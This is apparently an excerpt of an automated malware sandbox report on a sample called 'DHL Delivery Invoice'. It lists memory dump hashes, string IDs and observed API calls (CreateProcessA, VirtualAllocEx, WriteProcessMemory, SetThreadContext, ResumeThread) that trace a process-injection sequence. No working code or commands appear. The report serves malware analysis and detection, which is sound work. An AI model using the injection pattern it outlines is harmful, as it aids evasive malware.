                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 303c37b19de06342e1dc7dde7a94c4e9b1aa19ea255720ff5cb814bd082c2383
                                                                                                                                  • Instruction ID: edc9b1dbc141270cc5d30e9da3d9ead42db988a024fba2f4a54db87597858017
                                                                                                                                  • Opcode Fuzzy Hash: 303c37b19de06342e1dc7dde7a94c4e9b1aa19ea255720ff5cb814bd082c2383
                                                                                                                                  • Instruction Fuzzy Hash: D2E06830E1929A7BDF60CB70D994B8B7BADF702204F1088E8E004CB102F176CE0087A1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1324371161
                                                                                                                                  • Opcode ID: ab60bf35a978501dd7f1babc4ffaa7c51149ccef158519098e7dec4a3f67f9a2
                                                                                                                                  • Instruction ID: c2d3dbdf9ec718c107ebde2ebbe96edbaf6308c8fc561a30098a3580248cc181
                                                                                                                                  • Opcode Fuzzy Hash: ab60bf35a978501dd7f1babc4ffaa7c51149ccef158519098e7dec4a3f67f9a2
                                                                                                                                  • Instruction Fuzzy Hash: B9123F70E01229CFDB64EF65C994A9EB7F2BF88700F208569D409AB365DB349D85CF84
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1078448309
                                                                                                                                  • Opcode ID: 9602b2b89fd5de8cd2e59ff94a7aa7dd2fe2bece8f4d68e3e9f8377460d31dc2
                                                                                                                                  • Instruction ID: f28b032008e8c0a333f0a5bdf6de97c16e21bb53356e87257769138f82336758
                                                                                                                                  • Opcode Fuzzy Hash: 9602b2b89fd5de8cd2e59ff94a7aa7dd2fe2bece8f4d68e3e9f8377460d31dc2
                                                                                                                                  • Instruction Fuzzy Hash: 4D919F30A1021DDFEB68EF64D654BAEB7F2BF84700F208429E445AB395DB799C45CB90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1342094364
                                                                                                                                  • Opcode ID: 83f5511f743eb7a6487685cc2bae958181c5405c5b329b4d0a6614c2948bbbb8
                                                                                                                                  • Instruction ID: e083ed9a6e979182b95fadb9fd32d77c20a77297a5c80db448a354c93df2ed90
                                                                                                                                  • Opcode Fuzzy Hash: 83f5511f743eb7a6487685cc2bae958181c5405c5b329b4d0a6614c2948bbbb8
                                                                                                                                  • Instruction Fuzzy Hash: 61F15070A01218CFDB58EF68C554A6EB7F2BF88700F208569D409AB369CB35EC46CB54
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-2881790790
                                                                                                                                  • Opcode ID: 3a05feb7864693d76c0e8a6b977a45bf474e994b4fbb10831b44fb487d046054
                                                                                                                                  • Instruction ID: 300c0bcf3b71aab852d4224d7031cc10ecca09c5493935c02e2284d462e5fc73
                                                                                                                                  • Opcode Fuzzy Hash: 3a05feb7864693d76c0e8a6b977a45bf474e994b4fbb10831b44fb487d046054
                                                                                                                                  • Instruction Fuzzy Hash: 0BB14C30A11219CFDB68EF65C5446AEB7F2BF84700F248869E409AB395DB75DC86CB90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: LRkq$LRkq$$kq$$kq
                                                                                                                                  • API String ID: 0-2392252538
                                                                                                                                  • Opcode ID: afd2f19f2c666bf965ce198fc4e8f838886a367da6982cbb291bd648f59f5ca4
                                                                                                                                  • Instruction ID: 0901304895e0dc385176d9d884b2eb20cbcced817ec3c240712208feb60ea654
                                                                                                                                  • Opcode Fuzzy Hash: afd2f19f2c666bf965ce198fc4e8f838886a367da6982cbb291bd648f59f5ca4
                                                                                                                                  • Instruction Fuzzy Hash: 7E51B031B002158FDB58EF68D944A6AB7E2FF88710F148969F4169B3A9DB35EC44CB90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-2881790790
                                                                                                                                  • Opcode ID: ad2e765f920722acc31df7a60d7ce2377f8cafdb67796175db34ee40c4ead88d
                                                                                                                                  • Instruction ID: ab7862ec9d8e1f967520768ae7d90af456795503abf2d5e99a987fc169fd2a42
                                                                                                                                  • Opcode Fuzzy Hash: ad2e765f920722acc31df7a60d7ce2377f8cafdb67796175db34ee40c4ead88d
                                                                                                                                  • Instruction Fuzzy Hash: CE51AF34E102158FCFA4EB64D580AAEB3B2FF84711F208969E85AAB355DB34DC45CF90

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:13%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:222
                                                                                                                                  Total number of Limit Nodes:19

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02E60F06
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 7d73dfc6526db20b9e740a87f264e953c374b1c96e673dc9e9fe6b4b28a31c04
                                                                                                                                  • Instruction ID: 620d9592448f5b587ffec4b91ad122f4ee66e7ef6ac96ea164801a7382800e99
                                                                                                                                  • Opcode Fuzzy Hash: 7d73dfc6526db20b9e740a87f264e953c374b1c96e673dc9e9fe6b4b28a31c04
                                                                                                                                  • Instruction Fuzzy Hash: E491AE71D40229DFDF10CFA8C844BEEBBB2BF48354F0495A9E809A7254DB759981CF91

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02E60F06
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 85575ffd09942816d01a96f425b4ad9c668d4a9882de08e6d6202941ae625a9f
                                                                                                                                  • Instruction ID: 30aa7900cd971964f4f9360b44f6b703907f326ba94773f37047f100e3fa5a6d
                                                                                                                                  • Opcode Fuzzy Hash: 85575ffd09942816d01a96f425b4ad9c668d4a9882de08e6d6202941ae625a9f
                                                                                                                                  • Instruction Fuzzy Hash: 52919D71D40229DFDF10CFA8C844BEEBBB2BF48314F1495A9E809A7280DB759981CF91

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 0304B4B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877233416.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_3040000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                  • Opcode ID: 4ddf8794dbabaae67a849d2fd48dc74c89fc9d56d40a235474a9e3a4874cd02a
                                                                                                                                  • Instruction ID: b6535e9e0e50fc923f6fa5a38a850b613e452b40714db92871dc4a7768d0cff9
                                                                                                                                  • Opcode Fuzzy Hash: 4ddf8794dbabaae67a849d2fd48dc74c89fc9d56d40a235474a9e3a4874cd02a
                                                                                                                                  • Instruction Fuzzy Hash: 3F41F0B0C01619CFDB24DFA9C944B9DFBF5BF48304F24816AD408AB255DB75A986CF90

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 0304B4B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877233416.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_3040000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                  • Opcode ID: d38922f7ce6c4981899f7a18cccb084d2b738fcf3009e88d37d20b44e9c45aa6
                                                                                                                                  • Instruction ID: 99f38c0e5b9780db9ccfc4cd74ca109c220c5280bb67f490ee506de249579f35
                                                                                                                                  • Opcode Fuzzy Hash: d38922f7ce6c4981899f7a18cccb084d2b738fcf3009e88d37d20b44e9c45aa6
                                                                                                                                  • Instruction Fuzzy Hash: E741EDB0C0061DCADB24DFA9D844B8EBBF5BF48304F24806AD408AB255DBB5A985CF90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1883196627.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_7f60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFromIconResource
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3668623891-0
                                                                                                                                  • Opcode ID: febd43c3846e67b4119f8d51ba037683f975c4cbb4d8696774de6df5c8b1d302
                                                                                                                                  • Instruction ID: 60e602d5a52408190ee3b8b01796fe998902b8f8ba0a502ce8ee46094565a904
                                                                                                                                  • Opcode Fuzzy Hash: febd43c3846e67b4119f8d51ba037683f975c4cbb4d8696774de6df5c8b1d302
                                                                                                                                  • Instruction Fuzzy Hash: 2C317AB19043999FCB12DFA9D844AEEBFF4EF09310F18805AF954AB221C3359950DFA1
                                                                                                                                  APIs
                                                                                                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07F66CE5,?,?), ref: 07F66D97
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1883196627.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_7f60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DrawText
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2175133113-0
                                                                                                                                  • Opcode ID: d615a12f5cd50401f6e7541e5a616c05e989ab1c5b96301d11e5ae05e183a162
                                                                                                                                  • Instruction ID: 9ba5c7c5b569f2ee9ca912dba3e0557768f3b0efb021ba74a0f0349662da54ee
                                                                                                                                  • Opcode Fuzzy Hash: d615a12f5cd50401f6e7541e5a616c05e989ab1c5b96301d11e5ae05e183a162
                                                                                                                                  • Instruction Fuzzy Hash: 8C31D2B5D002499FDB10DF9AD884ADEFBF4FF48320F18842AE919A7610D775A954CFA0
                                                                                                                                  APIs
                                                                                                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07F66CE5,?,?), ref: 07F66D97
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1883196627.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_7f60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DrawText
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02E60AD8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02E60AD8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02E604F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  APIs
                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02E60BB8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                  APIs
                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02E60BB8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02E604F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  APIs
                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07F68382,?,?,?,?,?), ref: 07F68427
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1883196627.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_7f60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFromIconResource
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02E609F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02E609F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  APIs
                                                                                                                                  • ResumeThread.KERNELBASE(00000009), ref: 086AFE9A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1883398187.00000000086A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_86a0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  APIs
                                                                                                                                  • ResumeThread.KERNELBASE(00000009), ref: 086AFE9A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1883398187.00000000086A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_86a0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 02E63DCD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 02E63DCD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                  • Opcode ID: b898c1c3f9c158a5b7ceb3085dc32ee3a9aa69fed39ad35f8c74ac328c459f29
                                                                                                                                  • Instruction ID: 63b849c829c8fc61f745675eaffcae5ac68b73ff9a827b0b86a572120aae084f
                                                                                                                                  • Opcode Fuzzy Hash: b898c1c3f9c158a5b7ceb3085dc32ee3a9aa69fed39ad35f8c74ac328c459f29
                                                                                                                                  • Instruction Fuzzy Hash: 9B1103B58003489FCB10DF9AD989BDEBBF8EB48324F10845AE559A7210C375A544CFA1

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:11.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:39
                                                                                                                                  Total number of Limit Nodes:6

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1342094364
                                                                                                                                  • Opcode ID: 5fad17fdd0390899952a221e50d31788e3e04456ccbfe02a502d840bdd09743c
                                                                                                                                  • Instruction ID: 3d8731af9faf5287ff707ad8131bbde83c42b392e637a6525f1a1709d7039e25
                                                                                                                                  • Opcode Fuzzy Hash: 5fad17fdd0390899952a221e50d31788e3e04456ccbfe02a502d840bdd09743c
                                                                                                                                  • Instruction Fuzzy Hash: 58322F31E10759CFDB14EF65D99459DB7B2FFC9300F20869AD409AB264EB30AD85CB90

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq
                                                                                                                                  • API String ID: 0-3550614674
                                                                                                                                  • Opcode ID: 4304002d9b089e6f937beb96d86f12251cc4ed420f2e3d4c866b0e055c2c0254
                                                                                                                                  • Instruction ID: c5050a45c20bd6c57a1769210daabe11acebaf66eea17ec66f8c906bb6c2c0ba
                                                                                                                                  • Opcode Fuzzy Hash: 4304002d9b089e6f937beb96d86f12251cc4ed420f2e3d4c866b0e055c2c0254
                                                                                                                                  • Instruction Fuzzy Hash: 5102C030B012059FDB54DF69D594AAEB7F2FF84300F148929E5169B3A8DB35ED82CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 787d85255b8ef1ae16a6ab09d5a17ae08eb4ae368ae54aa0a9df4df8d47c12a8
                                                                                                                                  • Instruction ID: eed13da388462570b816d48fc3aaabc6380cb6f6528fc146b1bf2e000812258b
                                                                                                                                  • Opcode Fuzzy Hash: 787d85255b8ef1ae16a6ab09d5a17ae08eb4ae368ae54aa0a9df4df8d47c12a8
                                                                                                                                  • Instruction Fuzzy Hash: 7E925534E002448FDBA4DF68C584B5DBBF6FB45310F5484AAD44AAB365DB39EE85CB80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 36ec93251bc325cd86b1ff4afb4077ab74e490f7ad869152e47b6ee0d8239073
                                                                                                                                  • Instruction ID: e25ee1e091df7d0e8da1af17543cda494e1aceeb5c46c64ec4603ffbfd2aaa4d
                                                                                                                                  • Opcode Fuzzy Hash: 36ec93251bc325cd86b1ff4afb4077ab74e490f7ad869152e47b6ee0d8239073
                                                                                                                                  • Instruction Fuzzy Hash: 58629D34B102058FDB54DB6AD584BADBBF2EB98310F248469E406DB394DB35EE85CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 69260616ef153a1f5e290515a62ae8d7d5279cddfa226ee753896e5b4c594b03
                                                                                                                                  • Instruction ID: 9cce0af3224d39362138cf035762a8fe8a89386c7c54431434c5e95eae59061d
                                                                                                                                  • Opcode Fuzzy Hash: 69260616ef153a1f5e290515a62ae8d7d5279cddfa226ee753896e5b4c594b03
                                                                                                                                  • Instruction Fuzzy Hash: 18328030B002058FDF54DB69D994BAEBBB2FB88310F108529E515EB395DB38DD81CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 39390b403d557549ff776144f8109e10c70d57442b9efa4e76b8c231b86bc0cf
                                                                                                                                  • Instruction ID: e90474186e75cae984df53defee758c27b3613daf75e167b6b55c415e41ba240
                                                                                                                                  • Opcode Fuzzy Hash: 39390b403d557549ff776144f8109e10c70d57442b9efa4e76b8c231b86bc0cf
                                                                                                                                  • Instruction Fuzzy Hash: 1B120275F002058FDB60DB64D9806AEB7B2FF84324F64842ED956DB394DA36ED81CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6a2b80beee33cc10641aa5fa2b515d02685de73430fbe066826cfcb89218a766
                                                                                                                                  • Instruction ID: 99919221a574a017b85290fcd9000e11dcd9733bc7bdb6e51bb6a051f21e0ba0
                                                                                                                                  • Opcode Fuzzy Hash: 6a2b80beee33cc10641aa5fa2b515d02685de73430fbe066826cfcb89218a766
                                                                                                                                  • Instruction Fuzzy Hash: 70227E30E102098FDF64DB68D6807BEB7B6FB49310F24852AE405EB395DA35DD81CB91

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1342094364
                                                                                                                                  • Opcode ID: 906a968808cbe5a2624390f335fc01b5f853bc0beb19ece1b2f0c97d587b4ae7
                                                                                                                                  • Instruction ID: c9a83d7884777f03e4a00aba869db14d420380c2afb36d6da839653b9cc748b8
